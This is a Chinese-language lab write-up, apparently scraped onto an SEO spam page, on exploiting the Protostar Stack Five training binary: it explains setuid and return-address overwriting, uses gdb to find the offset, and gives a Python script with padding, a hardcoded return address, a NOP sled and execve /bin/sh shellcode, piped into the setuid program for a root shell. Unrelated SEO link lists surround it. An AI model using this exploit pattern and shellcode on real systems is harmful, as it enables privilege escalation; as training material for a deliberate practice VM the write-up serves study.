当前位置: 首页 > news >正文

计算机网络搭建百度seo泛解析代发排名

计算机网络搭建,百度seo泛解析代发排名,济南学习网站制作,旅游网站策划书前言 这是一个系列文章,之前已经介绍过一些二进制安全的基础知识,这里就不过多重复提及,不熟悉的同学可以去看看我之前写的文章 二进制安全虚拟机Protostar靶场 安装,基础知识讲解,破解STACK ZERO https://blog.csdn.net/qq_45894840/artic…

在这里插入图片描述

前言

这是一个系列文章,之前已经介绍过一些二进制安全的基础知识,这里就不过多重复提及,不熟悉的同学可以去看看我之前写的文章

二进制安全虚拟机Protostar靶场 安装,基础知识讲解,破解STACK ZERO
https://blog.csdn.net/qq_45894840/article/details/129490504?spm=1001.2014.3001.5501
二进制安全虚拟机Protostar靶场(2)基础知识讲解,栈溢出覆盖变量 Stack One,Stack Two
https://blog.csdn.net/qq_45894840/article/details/132688653?spm=1001.2014.3001.5501
二进制安全虚拟机Protostar靶场(3)溢出控制程序指针,基础知识讲解 Stack Three,Stack Four
https://blog.csdn.net/qq_45894840/article/details/132720953?spm=1001.2014.3001.5501

Stack Five

程序静态分析

https://exploit.education/protostar/stack-five/

在这里插入图片描述

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>int main(int argc, char **argv)
{char buffer[64];gets(buffer);
}

这个程序很简单,只有两行,作用只是接受我们的输入

setuid

什么是setuid?

setuid代表设置用户身份,并且setuid设置调用进程的有效用户ID,用户运行程序的uid与调用进程的真实uid不匹配

这么说起来有点绕,我们来举一个例子

一个要以root权限运行的程序,但我们想让普通用户也能运行它,但又要防止该程序被攻击者利用,这里就需要用的setuid了

演示
我们用user用户运行一个vim
然后新开一个窗口查看后台进程

ps -aux

在这里插入图片描述
这里可以看到,我们的vim正在以user的权限运行中,然后我们去执行一下靶机上的setuid文件看看
在这里插入图片描述
这里可以看到,我们虽然是user用户,但执行文件后,文件正以root权限运行
我们查看文件的权限
在这里插入图片描述
r代表读,w代表写,x代表执行,那s是什么呢

s替换了以x的可执行文件,这被称为setuid位,根据刚刚的操作,应该知道了s是做什么的

当这个位被user权限的用户执行时,linux实际上是以文件的创造者的权限运行的,在这种情况下,它是以root权限运行的
我们的目标就是,破解这些文件然后拿到root权限

什么是栈

可以把栈想象成一个堆积的书本,你可以把新的书本放在最顶部,也可以取出最顶部的书本。

当程序执行时,它会使用栈来跟踪函数调用和变量的值。每次你调用一个函数,计算机会在栈上创建一个新的“帧”(就像书本一样),用来存储这个函数的局部变量和执行时的一些信息。当函数执行完毕时,这个帧会被从栈上移除,就像取出一本书本一样。

栈通常是“后进先出”的,这意味着最后放入栈的数据会最先被取出。这是因为栈的操作是非常快速和高效的,所以它经常用于管理函数调用和跟踪程序执行流程

为什么要覆盖ret返回地址

覆盖 ret 返回地址是一种计算机攻击技巧,攻击者利用它来改变程序执行的路径。这个过程有点像将一个路标或导航指令替换成你自己的指令,以便程序执行到你想要的地方。

想象一下,你在开车时遇到一个交叉路口,路标告诉你向左拐才能到达目的地。但是,攻击者可能会悄悄地改变路标,让你误以为需要向右拐。当你按照这个伪装的路标行驶时,你最终会到达攻击者想要的地方,而不是你本来的目的地。

在计算机中,程序执行的路径通常是通过返回地址控制的,这个返回地址告诉计算机在函数执行完毕后应该继续执行哪里的代码。攻击者可以通过修改这个返回地址,迫使程序跳转到他们指定的地方,通常是一段恶意代码,而不是正常的程序代码

获取ret返回地址

使用gdb打开程序,在执行leave指令的地方下一个断点

在这里插入图片描述

运行程序,随便输入一些字符,然后查看栈状态

x/100wx $esp

在这里插入图片描述

另外开一个远程连接界面,使用gdb打开程序,在执行ret指令的地方下一个断点

在这里插入图片描述

在第二个终端界面运行程序,随便输入一些字符,然后执行ret指令,查看程序跳转的地址

在这里插入图片描述

在这里插入图片描述

根据计算,我们需要80个字符就能完全覆盖ret的返回地址,然后再将我们的shellcode放到控制数据的堆栈里

在这里插入图片描述

nop指令

NOP指令是一种特殊的机器指令,它在计算机中执行时不做任何操作。简单来说,NOP指令是一种“空操作”,它不改变计算机的状态、不影响寄存器的值,也不执行任何计算或跳转

为了防止我们shellcode收到干扰,我们在shellcode代码前添加一些nop指令即可

脚本编写

import structpadding = "A" * 76
eip = struct.pack("I",0xbffff7c0)
nopnop = "\x90"*64
payload = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x88"print padding+eip+nopnop+payload

首先设置一个76位的垃圾字符,然后利用struct模块的pack功能,作用是将一个无符号整数(I 表示无符号整数)转换为二进制数据,跳转到控制数据的栈里,最后写入nop指令和shellcode代码,shellcode代码可以在这个网站里找到

http://shell-storm.org/shellcode/files/shellcode-811.html

在这里插入图片描述

这是一个linux x86架构执行/bin/sh的shellcode

如果我们直接运行脚本是得不到/bin/sh的

在这里插入图片描述

其实/bin/sh已经执行了,只是没有输入,我们可以用cat命令来重定向到标准输入输出

在这里插入图片描述

 (python stack5exp.py ; cat) | /opt/protostar/bin/stack5

在这里插入图片描述

成功破解程序

http://www.jinmujx.cn/news/116710.html

相关文章:

  • 做网站的费用 优帮云长沙百度快速排名优化
  • 南昌大型网站制作百度推广账户怎么开
  • 社会工作建设网站郑州专业网站建设公司
  • daozicms企业建站系统长春网站建设模板
  • 东莞网站建设.com手机优化软件哪个好
  • 做移动互联网站点成都网站制作维护
  • b2b网站大全黄页电商最新新闻事件今天
  • 广东建设教育协会网站首页百度服务中心
  • 淘宝客做网站教程saas建站
  • 老域名重新做网站淘宝联盟怎么推广
  • 济南建站优化线上营销
  • 网站做接口到app 价格打开搜索引擎
  • 做网站 设备拼多多seo是什么意思
  • 怎么使用电脑是做网站廊坊百度快照优化
  • 网站目录怎么做的软文发稿平台
  • 欧洲人喜欢什么样的服务器seo包年优化平台
  • 给公众号做头像的网站网站制作推广电话
  • 专业网站建设报价运营主要做什么工作
  • 怎么做企业招聘网站站长工具seo源码
  • 网站开发微信店铺引流的30种方法
  • 工程公司简介安卓手机优化软件排名
  • 深圳企业做网站公司有哪些百度seo怎么做网站内容优化
  • 长沙网站制作培训基地治疗腰椎间盘突出的特效药
  • 做网站开发 用的最多的语言拓客软件
  • wordpress gzip 和 cache 冲突吗成都最好的网站推广优化公司
  • 企业英文网站营销的主要目的有哪些
  • 广西网站设计服务企业网站建设方案策划书
  • 小程序赚钱的几种方法seo标题优化裤子关键词
  • 如何用axure做网站什么是网络营销与直播电商
  • 做网站还能赚钱今日热点新闻头条国内